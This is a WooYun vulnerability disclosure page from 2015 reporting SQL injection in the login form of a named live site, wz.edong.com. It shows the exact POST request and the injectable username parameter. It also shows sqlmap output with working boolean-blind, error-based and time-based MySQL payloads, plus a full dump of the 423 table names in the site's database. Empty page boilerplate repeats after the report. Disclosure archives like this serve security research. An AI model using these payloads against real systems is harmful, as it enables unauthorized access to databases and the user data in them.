E动网某站存在SQL注入 | wooyun-2015-0133186

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0133186

漏洞标题：

E动网某站存在SQL注入

漏洞详情

披露状态：

2015-08-11：细节已通知厂商并且等待厂商处理中
2015-08-16：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://wz.edong.com/

POST /index.php?a=checklogin&m=Users HTTP/1.1
Content-Length: 429
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=b65695a513516c3f7383b2e949f2ae17; __tsa___sid=121757005.1439207058369743571; __tsa__safe_nd=121757005.1439207092141
Host: wz.edong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=g00dPa%24%24w0rD&username=1111&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1

username参数

漏洞证明：

423张表：

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: password=g00dPa$$w0rD&username=1111') RLIKE (SELECT (CASE WHEN (1138=1138) THEN 1111 ELSE 0x28 END)) AND ('FUzF'='FUzF&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: password=g00dPa$$w0rD&username=1111') AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716b6d6471,(SELECT (CASE WHEN (8850=8850) THEN 1 ELSE 0 END)),0x7163676971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('PUJn'='PUJn&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: password=g00dPa$$w0rD&username=1111') AND 6883=BENCHMARK(5000000,MD5(0x67454b6c)) AND ('pppf'='pppf&__hash__=bf1ede35e1b284d4092f5216df92a632_558433125d9b628bb2e8eb392d59d7b1
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: wzedong007
[423 tables]
+-------------------------------------+
| wqy_access                          |
| wqy_adma                            |
| wqy_agent                           |
| wqy_agent_expenserecords            |
| wqy_agent_function                  |
| wqy_agent_price                     |
| wqy_alipay_config                   |
| wqy_api                             |
| wqy_areply                          |
| wqy_article                         |
| wqy_attribute                       |
| wqy_baoming                         |
| wqy_baoming_list                    |
| wqy_baoming_order                   |
| wqy_behavior                        |
| wqy_busines                         |
| wqy_busines_comment                 |
| wqy_busines_main                    |
| wqy_busines_pic                     |
| wqy_busines_second                  |
| wqy_car                             |
| wqy_car_utility                     |
| wqy_carmodel                        |
| wqy_carnews                         |
| wqy_carowner                        |
| wqy_carsaler                        |
| wqy_carseries                       |
| wqy_carset                          |
| wqy_caruser                         |
| wqy_case                            |
| wqy_catemenu                        |
| wqy_classify                        |
| wqy_company                         |
| wqy_company_staff                   |
| wqy_cosmetology                     |
| wqy_cosmetology_departments         |
| wqy_cosmetology_setup               |
| wqy_cosmetology_setup_control       |
| wqy_custom_field                    |
| wqy_custom_info                     |
| wqy_custom_limit                    |
| wqy_custom_set                      |
| wqy_czzreply_info                   |
| wqy_dati                            |
| wqy_dati_record                     |
| wqy_deliemail                       |
| wqy_delisms                         |
| wqy_diaoyan                         |
| wqy_diaoyan_timu                    |
| wqy_diaoyan_user                    |
| wqy_dining_table                    |
| wqy_dish                            |
| wqy_dish_company                    |
| wqy_dish_like                       |
| wqy_dish_order                      |
| wqy_dish_sort                       |
| wqy_dish_table                      |
| wqy_diyform                         |
| wqy_diyform_set                     |
| wqy_diymen_class                    |
| wqy_diymen_set                      |
| wqy_dream                           |
| wqy_estate                          |
| wqy_estate_album                    |
| wqy_estate_expert                   |
| wqy_estate_housetype                |
| wqy_estate_impress                  |
| wqy_estate_impress_add              |
| wqy_estate_son                      |
| wqy_fangchan                        |
| wqy_fangchan_reply                  |
| wqy_fenlei                          |
| wqy_fenlei_flash                    |
| wqy_fenlei_reply                    |
| wqy_fenlei_setcin                   |
| wqy_files                           |
| wqy_flash                           |
| wqy_forum_comment                   |
| wqy_forum_config                    |
| wqy_forum_message                   |
| wqy_forum_topics                    |
| wqy_function                        |
| wqy_gamereply_info                  |
| wqy_gametreply_info                 |
| wqy_gamettreply_info                |
| wqy_goldegg                         |
| wqy_goldegg_record                  |
| wqy_greeting_card                   |
| wqy_heka                            |
| wqy_heka_list                       |
| wqy_home                            |
| wqy_home_background                 |
| wqy_host                            |
| wqy_host_list_add                   |
| wqy_host_order                      |
| wqy_hotels_house                    |
| wqy_hotels_house_sort               |
| wqy_hotels_order                    |
| wqy_huadian                         |
| wqy_huadiancom                      |
| wqy_huadianphoto                    |
| wqy_huadianposter                   |
| wqy_huadiansub                      |
| wqy_huadianunits                    |
| wqy_huisuo_photo                    |
| wqy_hunqing                         |
| wqy_hunqingcom                      |
| wqy_hunqingphoto                    |
| wqy_hunqingposter                   |
| wqy_hunqingsub                      |
| wqy_hunqingunits                    |
| wqy_img                             |
| wqy_img_multi                       |
| wqy_indent                          |
| wqy_invites                         |
| wqy_invites_info                    |
| wqy_jianshen                        |
| wqy_jianshencom                     |
| wqy_jianshenphoto                   |
| wqy_jianshenposter                  |
| wqy_jianshensub                     |
| wqy_jianshenunits                   |
| wqy_jiaoyu                          |
| wqy_jiaoyucom                       |
| wqy_jiaoyuphoto                     |
| wqy_jiaoyuposter                    |
| wqy_jiaoyusub                       |
| wqy_jiaoyuunits                     |
| wqy_jiejing                         |
| wqy_jikedati                        |
| wqy_jikedati_flash                  |
| wqy_jikedati_reply                  |
| wqy_jikedati_setcin                 |
| wqy_jikedati_user                   |
| wqy_jiuba                           |
| wqy_jiubacom                        |
| wqy_jiubaphoto                      |
| wqy_jiubaposter                     |
| wqy_jiubasub                        |
| wqy_jiubaunits                      |
| wqy_kefu                            |
| wqy_keyword                         |
| wqy_ktv                             |
| wqy_ktv_photo                       |
| wqy_ktvcom                          |
| wqy_ktvphoto                        |
| wqy_ktvposter                       |
| wqy_ktvsub                          |
| wqy_ktvunits                        |
| wqy_leave                           |
| wqy_links                           |
| wqy_lottery                         |
| wqy_lottery_cheat                   |
| wqy_lottery_record                  |
| wqy_lvyou                           |
| wqy_lvyoucom                        |
| wqy_lvyouphoto                      |
| wqy_lvyouposter                     |
| wqy_lvyousub                        |
| wqy_lvyouunits                      |
| wqy_mail                            |
| wqy_market                          |
| wqy_market_area                     |
| wqy_market_cate                     |
| wqy_market_nav                      |
| wqy_market_park                     |
| wqy_market_slide                    |
| wqy_medical                         |
| wqy_medical_departments             |
| wqy_medical_set                     |
| wqy_medical_setup                   |
| wqy_medical_setup_control           |
| wqy_medical_user                    |
| wqy_meirong                         |
| wqy_meirong_album                   |
| wqy_meirong_expert                  |
| wqy_meirong_housetype               |
| wqy_meirong_impress                 |
| wqy_meirong_impress_add             |
| wqy_meirong_son                     |
| wqy_member                          |
| wqy_member_business                 |
| wqy_member_business_ad              |
| wqy_member_business_case            |
| wqy_member_business_fav             |
| wqy_member_business_product         |
| wqy_member_card_contact             |
| wqy_member_card_coupon              |
| wqy_member_card_create              |
| wqy_member_card_custom              |
| wqy_member_card_exchange            |
| wqy_member_card_focus               |
| wqy_member_card_info                |
| wqy_member_card_integral            |
| wqy_member_card_myintegral          |
| wqy_member_card_notice              |
| wqy_member_card_pay_record          |
| wqy_member_card_set                 |
| wqy_member_card_sign                |
| wqy_member_card_use_record          |
| wqy_member_card_vip                 |
| wqy_member_wei_category             |
| wqy_memberflash                     |
| wqy_moopha_article                  |
| wqy_moopha_attachement              |
| wqy_moopha_channel                  |
| wqy_moopha_channel_contentattribute |
| wqy_moopha_keywords                 |
| wqy_moopha_picture                  |
| wqy_moopha_site                     |
| wqy_moopha_template                 |
| wqy_moopha_user                     |
| wqy_msg                             |
| wqy_nearby_user                     |
| wqy_node                            |
| wqy_norms                           |
| wqy_ordering_class                  |
| wqy_ordering_set                    |
| wqy_other                           |
| wqy_panorama                        |
| wqy_payment                         |
| wqy_photo                           |
| wqy_photo_list                      |
| wqy_pic_wall                        |
| wqy_pic_walllog                     |
| wqy_product                         |
| wqy_product_attribute               |
| wqy_product_cart                    |
| wqy_product_cart_list               |
| wqy_product_cat                     |
| wqy_product_comment                 |
| wqy_product_diningtable             |
| wqy_product_image                   |
| wqy_product_mail_price              |
| wqy_product_setting                 |
| wqy_quanxian                        |
| wqy_recipe                          |
| wqy_recognition                     |
| wqy_reply                           |
| wqy_reply_info                      |
| wqy_requestdata                     |
| wqy_research                        |
| wqy_research_answer                 |
| wqy_research_question               |
| wqy_research_result                 |
| wqy_reservation                     |
| wqy_reservebook                     |
| wqy_rippleos_node                   |
| wqy_role                            |
| wqy_role_user                       |
| wqy_router                          |
| wqy_router_config                   |
| wqy_school_classify                 |
| wqy_school_score                    |
| wqy_school_set_index                |
| wqy_school_students                 |
| wqy_school_tcourse                  |
| wqy_school_teachers                 |
| wqy_selfform                        |
| wqy_selfform_input                  |
| wqy_selfform_value                  |
| wqy_send_message                    |
| wqy_seo                             |
| wqy_service_logs                    |
| wqy_service_user                    |
| wqy_setinfo                         |
| wqy_shake                           |
| wqy_shakelog                        |
| wqy_share                           |
| wqy_share_set                       |
| wqy_shipin                          |
| wqy_shipincom                       |
| wqy_shipinphoto                     |
| wqy_shipinposter                    |
| wqy_shipinsub                       |
| wqy_shipinunits                     |
| wqy_sign_conf                       |
| wqy_sign_in                         |
| wqy_sign_set                        |
| wqy_site_plugmenu                   |
| wqy_sjmreply_info                   |
| wqy_sms_expendrecord                |
| wqy_sms_record                      |
| wqy_snccode                         |
| wqy_sncode                          |
| wqy_storeflash                      |
| wqy_styleset                        |
| wqy_system_info                     |
| wqy_taobao                          |
| wqy_text                            |
| wqy_token_open                      |
| wqy_toshake                         |
| wqy_update_record                   |
| wqy_upyun_attachement               |
| wqy_user                            |
| wqy_user_group                      |
| wqy_user_request                    |
| wqy_userinfo                        |
| wqy_users                           |
| wqy_vcard                           |
| wqy_vcard_list                      |
| wqy_voiceresponse                   |
| wqy_vote                            |
| wqy_vote_item                       |
| wqy_vote_record                     |
| wqy_wall                            |
| wqy_wall_member                     |
| wqy_wall_message                    |
| wqy_wall_prize_record               |
| wqy_weather                         |
| wqy_wecha_user                      |
| wqy_wechat_group                    |
| wqy_wechat_group_list               |
| wqy_wecht_grout                     |
| wqy_wedding                         |
| wqy_wedding_info                    |
| wqy_wehcat_member_enddate           |
| wqy_weilivereply_info               |
| wqy_weixin_ad                       |
| wqy_weixin_adboard                  |
| wqy_weixin_address                  |
| wqy_weixin_admin                    |
| wqy_weixin_admin_auth               |
| wqy_weixin_admin_role               |
| wqy_weixin_album                    |
| wqy_weixin_album_cate               |
| wqy_weixin_album_comment            |
| wqy_weixin_album_follow             |
| wqy_weixin_album_item               |
| wqy_weixin_alipay                   |
| wqy_weixin_article                  |
| wqy_weixin_article_cate             |
| wqy_weixin_article_page             |
| wqy_weixin_auto_user                |
| wqy_weixin_badword                  |
| wqy_weixin_brandlist                |
| wqy_weixin_custom_menu              |
| wqy_weixin_delivery                 |
| wqy_weixin_flink                    |
| wqy_weixin_flink_cate               |
| wqy_weixin_images                   |
| wqy_weixin_ipban                    |
| wqy_weixin_item                     |
| wqy_weixin_item_attr                |
| wqy_weixin_item_cate                |
| wqy_weixin_item_cate_tag            |
| wqy_weixin_item_comment             |
| wqy_weixin_item_img                 |
| wqy_weixin_item_like                |
| wqy_weixin_item_order               |
| wqy_weixin_item_orig                |
| wqy_weixin_item_site                |
| wqy_weixin_item_tag                 |
| wqy_weixin_keyword                  |
| wqy_weixin_mail_queue               |
| wqy_weixin_menu                     |
| wqy_weixin_message                  |
| wqy_weixin_message_tpl              |
| wqy_weixin_nav                      |
| wqy_weixin_oauth                    |
| wqy_weixin_order_detail             |
| wqy_weixin_score_item               |
| wqy_weixin_score_item_cate          |
| wqy_weixin_score_log                |
| wqy_weixin_score_order              |
| wqy_weixin_setting                  |
| wqy_weixin_tag                      |
| wqy_weixin_topic                    |
| wqy_weixin_topic_at                 |
| wqy_weixin_topic_comment            |
| wqy_weixin_topic_index              |
| wqy_weixin_topic_relation           |
| wqy_weixin_user                     |
| wqy_weixin_user_address             |
| wqy_weixin_user_bind                |
| wqy_weixin_user_follow              |
| wqy_weixin_user_msgtip              |
| wqy_weixin_user_stat                |
| wqy_wifi                            |
| wqy_wuye                            |
| wqy_wuyecom                         |
| wqy_wuyephoto                       |
| wqy_wuyeposter                      |
| wqy_wuyesub                         |
| wqy_wuyeunits                       |
| wqy_wxuser                          |
| wqy_wxwall_award                    |
| wqy_wxwall_members                  |
| wqy_wxwall_message                  |
| wqy_yingyong                        |
| wqy_yingyong_reply                  |
| wqy_yml_config                      |
| wqy_yml_record                      |
| wqy_yuezhanreply_info               |
| wqy_yuyue                           |
| wqy_yuyue_order                     |
| wqy_yuyue_setcin                    |
| wqy_yzdd                            |
| wqy_yzdd_record                     |
| wqy_yzdd_record_data                |
| wqy_yzddtk                          |
| wqy_zhaopin                         |
| wqy_zhaopin_jianli                  |
| wqy_zhaopin_reply                   |
| wqy_zhengwu                         |
| wqy_zhengwucom                      |
| wqy_zhengwuphoto                    |
| wqy_zhengwuposter                   |
| wqy_zhengwusub                      |
| wqy_zhengwuunits                    |
| wqy_zhida                           |
| wqy_zhuangxiu                       |
| wqy_zhuangxiu_album                 |
| wqy_zhuangxiu_expert                |
| wqy_zhuangxiu_housetype             |
| wqy_zhuangxiu_impress               |
| wqy_zhuangxiu_impress_add           |
| wqy_zhuangxiu_son                   |
| wqy_zhuangxiucom                    |
| wqy_zhuangxiuphoto                  |
| wqy_zhuangxiuposter                 |
| wqy_zhuangxiusub                    |
| wqy_zhuangxiuunits                  |
+-------------------------------------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-08-16 10:38

厂商回复：

漏洞Rank：4 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云